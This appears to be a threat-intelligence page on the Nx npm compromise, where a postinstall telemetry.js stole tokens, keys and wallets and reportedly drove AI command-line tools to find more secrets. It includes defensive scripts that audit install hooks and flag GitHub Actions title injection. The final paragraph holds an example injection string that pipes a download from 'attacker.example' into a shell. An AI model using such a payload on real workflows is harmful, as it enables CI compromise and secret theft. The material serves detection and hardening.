
Telemetry.js credential stealer targeting Linux and macOS with public GitHub exfiltration

Malware Activity
1 unique source, 1 article

Summary


The telemetry.js credential stealer, delivered as a post-install script in compromised Nx npm packages, targets Linux and macOS developer machines and harvests GitHub tokens, npm tokens, SSH keys, .env files, and cryptocurrency wallet files, raising the risk of secret theft and repository exposure. The malware also drives installed AI command-line tools such as Claude, Q, and Gemini with prompt-driven queries to locate additional credentials. Stolen secrets were uploaded to public GitHub repositories named s1ngularity-repository, widening exposure well beyond the initial compromise.
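The stealer only ran because npm executes a package's install-time lifecycle scripts automatically. A first check after an incident of this kind is to list every package in a project's node_modules that declares such a hook. The Python below is an added example, not code from Nx, Wiz, or this page; the sample tree it builds is constructed, and the package names in it are hypothetical.

```python
import json
import os
import tempfile

# npm runs these automatically during `npm install` unless scripts are disabled.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")


def find_install_hooks(node_modules):
    """Walk a node_modules tree and return {package_name: {hook: command}}
    for every package.json that declares an install-time lifecycle script.
    Nested node_modules directories are covered by the walk. Unreadable or
    malformed package.json files are skipped rather than aborting the audit."""
    hooks = {}
    for root, _dirs, files in os.walk(node_modules):
        if "package.json" not in files:
            continue
        try:
            with open(os.path.join(root, "package.json"), encoding="utf-8") as fh:
                pkg = json.load(fh)
        except (OSError, ValueError):
            continue
        scripts = pkg.get("scripts") if isinstance(pkg, dict) else None
        if not isinstance(scripts, dict):
            continue
        found = {hook: scripts[hook] for hook in INSTALL_HOOKS if hook in scripts}
        if found:
            name = pkg.get("name") or os.path.relpath(root, node_modules)
            hooks[name] = found
    return hooks


def build_sample_tree():
    """Constructed sample (hypothetical package names): one clean package and
    one whose postinstall launches a script, mirroring how telemetry.js was
    delivered. Returns the path of the generated node_modules directory."""
    nm = os.path.join(tempfile.mkdtemp(), "node_modules")
    packages = {
        "clean-util": {"name": "clean-util", "version": "1.0.0",
                       "scripts": {"test": "node test.js"}},
        "evil-telemetry": {"name": "evil-telemetry", "version": "0.1.0",
                           "scripts": {"postinstall": "node telemetry.js"}},
    }
    for directory, manifest in packages.items():
        os.makedirs(os.path.join(nm, directory))
        with open(os.path.join(nm, directory, "package.json"), "w", encoding="utf-8") as fh:
            json.dump(manifest, fh)
    return nm


if __name__ == "__main__":
    for name, found in find_install_hooks(build_sample_tree()).items():
        print(name, found)
```

Point it at a real project's node_modules to get the list of packages that get code execution at install time. `npm install --ignore-scripts` (or `ignore-scripts=true` in `.npmrc`) stops these hooks from running at all; packages that genuinely need a build step then have to be handled explicitly, which is the trade-off.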

Related Happenings

Lightning PyPI router_runtime.js credential-stealing payload

Malware Activity
First: 30.04.2026 19:31 Last: 30.04.2026 19:31 Sources 1

About this happening: The **Lightning** PyPI package was pushed in **malicious versions 2.6.2 and 2.6.3** on **April 30, 2026**, turning a normal install into **credential theft** for **developer and C...

Latest development: 04.05.2026 20:15

Microsoft Threat Intelligence says Defender detected and prevented the malicious `lightning==2.6.3` routine in customer environments, notified the Lightning maintainer, and warned that users who ran `import lightning` may need to rotate exposed secrets, keys, and tokens.

Ghost campaign malicious npm package operation

Campaign
First: 24.03.2026 14:00 Last: 24.03.2026 14:00 Sources 1

About this happening: The **Ghost campaign** is pushing **malicious npm packages** that steal **sudo/root credentials** and enable wallet-targeting payloads, raising risk for developers using the **Nod...

GhostLoader staged npm install payload activity

Malware Activity
First: 24.03.2026 14:00 Last: 24.03.2026 14:00 Sources 1

About this happening: **GhostLoader** is now being delivered through **staged npm install scripts**, turning routine package installation into a route for **data theft** and **cryptocurrency wallet** t...

Vidar Stealer 2.0 fake game-cheat distribution

Malware Activity
First: 18.03.2026 13:15 Last: 18.03.2026 13:15 Sources 1

About this happening: The **Vidar Stealer 2.0** malware is being spread through **fake game-cheat repositories** and **Reddit lures**, putting players seeking cheats for major online games at risk of *...

Github[.]com/xinfeisoft/crypto supply-chain malware activity delivering Rekoobe

Malware Activity
First: 27.02.2026 17:33 Last: 27.02.2026 17:33 Sources 1

About this happening: The **malicious Go module github[.]com/xinfeisoft/crypto** has been identified as a **supply-chain malware package** that steals terminal passwords and delivers **Rekoobe** on **L...

Timeline

  1. 06.09.2025 17:11 · 1 article

    Nx GitHub Actions compromise publishes telemetry.js on NPM

    Exploitation Observed

    Attackers exploited a flawed GitHub Actions workflow in the Nx repository to publish malicious Nx packages to npm containing telemetry.js, a post-install credential stealer that targets Linux and macOS systems and attempts to steal GitHub tokens, npm tokens, SSH keys, .env files, and crypto wallets, uploading them to public GitHub repositories named "s1ngularity-repository".

  2. 06.09.2025 17:11 · 1 article

    Leaked GitHub tokens expose private repositories as public s1ngularity copies

    Campaign Scope Update

    Attackers used leaked GitHub tokens to flip private repositories to public and rename them to include the "s1ngularity" string, expanding the blast radius to another 480 accounts and 6,700 private repositories.

  3. 06.09.2025 17:11 · 1 article

    Compromised accounts publish private repositories from a single victim organization

    Victim Impact Update

    On August 31, 2025, two compromised accounts were used against a single victim organization to publish an additional 500 private repositories, extending the exposure created by the earlier token theft and public-repository conversion.

  4. 06.09.2025 17:11 · 2 articles

    Wiz quantifies the Nx s1ngularity fallout and Nx hardens publishing controls

    Technical Analysis Update

    Wiz's post-incident analysis says the Nx compromise exposed 2,180 accounts and 7,200 repositories across three distinct phases, and that many of the leaked secrets remained valid. The Nx team attributes the compromise to pull request title injection combined with insecure use of the pull_request_target trigger; in response it removed the malicious packages, revoked and rotated the compromised tokens, adopted npm's Trusted Publisher model, and added manual approval for PR-triggered workflows.

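The root cause the Nx team describes in the last timeline entry, a pull request title expanded inside a `run:` step of a workflow that fires on `pull_request_target` and therefore has access to repository secrets, is a pattern a workflow audit can flag before it is exploited. The scanner below is an added example, not code from Nx, Wiz, or this page. The two workflow snippets are constructed, the workflow and job names are hypothetical, and the list of attacker-controlled expressions is a common starting set rather than a complete one.

```python
import re

# Event-payload fields a fork PR author controls. Assumption: a starting set,
# not exhaustive; extend it for the events your own workflows consume.
UNTRUSTED_EXPR = re.compile(
    r"\$\{\{\s*("
    r"github\.event\.(?:pull_request\.(?:title|body|head\.(?:ref|label))"
    r"|issue\.(?:title|body)|comment\.body)"
    r"|github\.head_ref"
    r")\s*\}\}"
)
# Matches `run:` whether it opens a list item (`- run:`) or follows `- name:`.
RUN_KEY = re.compile(r"^(\s*(?:-\s+)?)run:")


def find_run_injections(workflow_text):
    """Return [(line_no, expression)] for untrusted expressions expanded
    directly inside a `run:` script, inline or as a block scalar. Expressions
    placed under `env:` are not reported: the runner substitutes them into
    the environment before the shell starts, so they cannot alter the script."""
    findings = []
    in_run, run_col = False, -1
    for n, line in enumerate(workflow_text.splitlines(), 1):
        m = RUN_KEY.match(line)
        if m:
            in_run, run_col = True, len(m.group(1))
            findings += [(n, x.group(0)) for x in UNTRUSTED_EXPR.finditer(line)]
            continue
        if not in_run:
            continue
        if not line.strip():            # blank lines belong to a block scalar
            continue
        if len(line) - len(line.lstrip()) > run_col:
            findings += [(n, x.group(0)) for x in UNTRUSTED_EXPR.finditer(line)]
        else:
            in_run = False              # back at key level: the script ended
    return findings


def assess(workflow_text):
    """Combine the two conditions that made the Nx workflow exploitable: a
    privileged trigger (secrets exposed to fork PRs) and an injectable step.
    The trigger check is a plain word match, so a comment mentioning
    pull_request_target also counts; review such hits by hand."""
    privileged = re.search(r"\bpull_request_target\b", workflow_text) is not None
    hits = find_run_injections(workflow_text)
    return {"privileged_trigger": privileged,
            "run_injections": hits,
            "exploitable": privileged and bool(hits)}


# Constructed sample: the vulnerable shape (title interpolated into the shell).
VULNERABLE = """\
name: pr-greeting
on:
  pull_request_target:
    types: [opened, edited]
jobs:
  greet:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Echo PR title
        run: |
          echo "New PR: ${{ github.event.pull_request.title }}"
"""

# Constructed sample: the hardened shape (value passed through env, and the
# unprivileged pull_request trigger, which gets no secrets for fork PRs).
HARDENED = """\
name: pr-greeting
on:
  pull_request:
jobs:
  greet:
    runs-on: ubuntu-latest
    steps:
      - name: Echo PR title
        env:
          PR_TITLE: ${{ github.event.pull_request.title }}
        run: |
          echo "New PR: $PR_TITLE"
"""

if __name__ == "__main__":
    print("vulnerable:", assess(VULNERABLE))
    print("hardened:  ", assess(HARDENED))
```

A title such as `"; curl attacker.example | sh #` would be spliced verbatim into the shell script in the vulnerable form; in the hardened form it is only ever the value of `$PR_TITLE`. Where `pull_request_target` is genuinely required, the `env:` indirection alone removes the injection, and the manual-approval gate the Nx team added limits who can trigger the privileged job at all.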